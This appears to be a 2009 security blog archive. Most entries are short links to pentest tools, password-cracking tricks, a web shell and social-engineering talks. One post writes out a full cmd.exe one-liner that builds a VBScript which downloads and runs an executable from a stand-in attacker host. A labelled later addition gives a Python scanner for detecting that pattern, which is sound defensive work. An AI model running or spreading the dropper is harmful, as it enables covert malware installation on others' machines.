Wednesday, March 25, 2009

SQL Injection Not Just 1=1 Slides

Good slide deck on SQLMap - one of those greatly underestimated tools:

Cracking passwords with Wikipedia

Sebastien Raveau shares his trick for cracking passwords using not a dictionary but Wikipedia. Combine this with wordlist-based rainbow tables and you have quite the effective cracking machine.
Tricks of the Trade: Cracking passwords with Wikipedia, Wiktionary, Wikibooks etc

You can find Sebastien on Twitter: @sraveau



Saturday, March 21, 2009

How to present while people are twittering

Not technical but a very good article for presenters in this twitter/socmed age:
http://pistachioconsulting.com/twitter-presentations/

Saturday, March 14, 2009

Wireless Security Tools

Stumbled across this list of wireless tools:
http://www.corecom.com/html/wlan_tools.html

SQL Injection for Oracle (pdf)

Free Tools - Inguardians

Free Tools - Joshua Wright

Free Tools - SecureState

Uninformed PT and RE ezine

Preventing SEH Overwrites

The "Ultimate" list of Fuzzers

Doesn't seem very "Ultimate", but it's a good list:
http://www.infosecinstitute.com/blog/2005/12/fuzzers-ultimate-list.html

c99madshell.php

Active Man in the Middle Attack

Friday, March 13, 2009

Social Engineering Webcast

Chris Nickerson and Mike Murray put on a good webinar about Social Engineering. Check out the recording and slide deck here:
http://www.ethicalhacker.net/content/view/242/2/

Wednesday, March 11, 2009

Shell Greed

On Twitter I posted a long shell command that would boot/kick every other user off a system. @marcinw made it shorter and I submitted it to Shell-fu.org. Today they posted it live. Here is the link:
http://www.shell-fu.org/lister.php?id=558

Tuesday, March 10, 2009

HTML to PDF

The site does just what it says. It has a ton of applications, but the one I'm interested in at the moment is using it to throw things onto my Kindle for later reading.
http://www.html-pdf-converter.com/

Abusing Citrix - Part 1

PHP Shell Injection through PHP Log Parsing

Monday, March 9, 2009

Public Rainbow-Tables

Oldie but a goodie that you just might not know about:
http://www.plain-text.info


Saturday, March 7, 2009

One LONG line wget for windows

"cmd.exe /c echo Const adTypeBinary = 1 > C:\windows\getnrun.vbs & echo Const adSaveCreateOverWrite = 2 >> C:\windows\getnrun.vbs & echo Dim BinaryStream >> C:\windows\getnrun.vbs & echo Set BinaryStream = CreateObject("ADODB.Stream") >> C:\windows\getnrun.vbs & echo BinaryStream.Type = adTypeBinary >> C:\windows\getnrun.vbs & echo BinaryStream.Open >> C:\windows\getnrun.vbs & echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) >> C:\windows\getnrun.vbs & echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> C:\windows\getnrun.vbs & echo Function BinaryGetURL(URL) >> C:\windows\getnrun.vbs & echo Dim Http >> C:\windows\getnrun.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> C:\windows\getnrun.vbs & echo Http.Open "GET", URL, False >> C:\windows\getnrun.vbs & echo Http.Send >> C:\windows\getnrun.vbs & echo BinaryGetURL = Http.ResponseBody >> C:\windows\getnrun.vbs & echo End Function >> C:\windows\getnrun.vbs & echo Set shell = CreateObject("WScript.Shell") >> C:\windows\getnrun.vbs & echo shell.Run "C:\update.exe" >> C:\windows\getnrun.vbs & start C:\windows\getnrun.vbs http://evilhacker.com/update.exe C:\update.exe"
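Added here as a detection-side example, not code from the original post: a small Python scanner for process-creation command lines that flags the shape of the one-liner above, namely a single cmd.exe command line that builds a script file with echo redirects and then launches that same file, with a COM download object (WinHttpRequest / XMLHTTP / ADODB.Stream) or a URL in the body. The sample command lines are constructed (the dropper-like one uses the placeholder host example.invalid), and the indicator names and the none/medium/high verdict scale are assumptions of this example, not fields of any real product.

```python
import re

# Constructed sample process-creation command lines (not real telemetry).
# The first mimics the shape of the one-liner above; the others are benign noise
# or a script that is written and run without any download behaviour.
SAMPLE_COMMAND_LINES = [
    r'cmd.exe /c echo Const adTypeBinary = 1 > C:\windows\getnrun.vbs '
    r'& echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> C:\windows\getnrun.vbs '
    r'& echo shell.Run "C:\update.exe" >> C:\windows\getnrun.vbs '
    r'& start C:\windows\getnrun.vbs http://example.invalid/update.exe C:\update.exe',
    r'cmd.exe /c echo build ok >> C:\build\log.txt',
    r'cscript.exe C:\scripts\inventory.vbs',
    r'cmd.exe /c echo Set sh = CreateObject("WScript.Shell") > C:\tmp\a.vbs & cscript C:\tmp\a.vbs',
]

# Script extensions that Windows will happily execute by path.
SCRIPT_EXT = r'\.(?:vbs|vbe|js|jse|wsf|hta|bat|cmd|ps1)\b'

# "echo <anything> > file.vbs" or ">> file.vbs" inside one cmd segment.
WRITE_RE = re.compile(
    r'echo\b[^&|]*>{1,2}\s*("?[^"&|\s]+' + SCRIPT_EXT + r')', re.IGNORECASE)

# "start [/switch ...] file.vbs", "cscript file.vbs", "wscript file.vbs", "mshta file.hta".
LAUNCH_RE = re.compile(
    r'\b(?:start|cscript(?:\.exe)?|wscript(?:\.exe)?|mshta(?:\.exe)?)\b\s+'
    r'(?:/\w+\s+)*"?([^"&|\s]+' + SCRIPT_EXT + r')', re.IGNORECASE)

# Secondary indicators that raise the verdict from "writes and runs a script"
# to "writes and runs a downloader". Names are this example's own labels.
INDICATORS = {
    'downloader_com_object': re.compile(
        r'WinHttp\.WinHttpRequest|MSXML2\.(?:Server)?XMLHTTP|ADODB\.Stream', re.IGNORECASE),
    'url_argument': re.compile(r'https?://', re.IGNORECASE),
    'shell_run': re.compile(r'\bshell\.Run\b', re.IGNORECASE),
}


def _normalise(path: str) -> str:
    # Quotes and case do not matter to cmd.exe when it resolves the path.
    return path.strip('"').lower()


def analyze_command_line(cmdline: str) -> dict:
    """Return which script paths were written, which were launched, and a verdict."""
    written = {_normalise(p) for p in WRITE_RE.findall(cmdline)}
    launched = {_normalise(p) for p in LAUNCH_RE.findall(cmdline)}
    # The core signal: the same file is created by echo and executed in one command line.
    self_launched = sorted(written & launched)
    indicators = sorted(name for name, rx in INDICATORS.items() if rx.search(cmdline))
    if self_launched and indicators:
        verdict = 'high'
    elif self_launched:
        verdict = 'medium'
    else:
        verdict = 'none'
    return {
        'written': sorted(written),
        'launched': sorted(launched),
        'self_launched': self_launched,
        'indicators': indicators,
        'verdict': verdict,
    }


def scan(command_lines) -> list:
    """Run the analysis over a batch and return (index, verdict) for every alert."""
    alerts = []
    for idx, line in enumerate(command_lines):
        result = analyze_command_line(line)
        if result['verdict'] != 'none':
            alerts.append((idx, result['verdict']))
    return alerts


if __name__ == '__main__':
    for idx, line in enumerate(SAMPLE_COMMAND_LINES):
        result = analyze_command_line(line)
        print(f'[{idx}] verdict={result["verdict"]} '
              f'self_launched={result["self_launched"]} indicators={result["indicators"]}')
```

The write/launch correlation is the part worth keeping even if the indicator list changes: on its own, echo-redirect into a script file is common in build scripts, and on its own running a .vbs is common in admin tooling, so each pattern alone is noisy, while both in one command line is rare outside droppers of this kind. The constructed fourth sample shows the medium case deliberately, so a triage queue can rank it below the one that also carries a download object and a URL.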

Friday, March 6, 2009

Fact/Fiction Book by Jayson Street

Check out the site for some sneak peeks into the Fact/Fiction book coming out in the BH USA / DefCon timeframe!
The story is F1ct10n. The threats are real.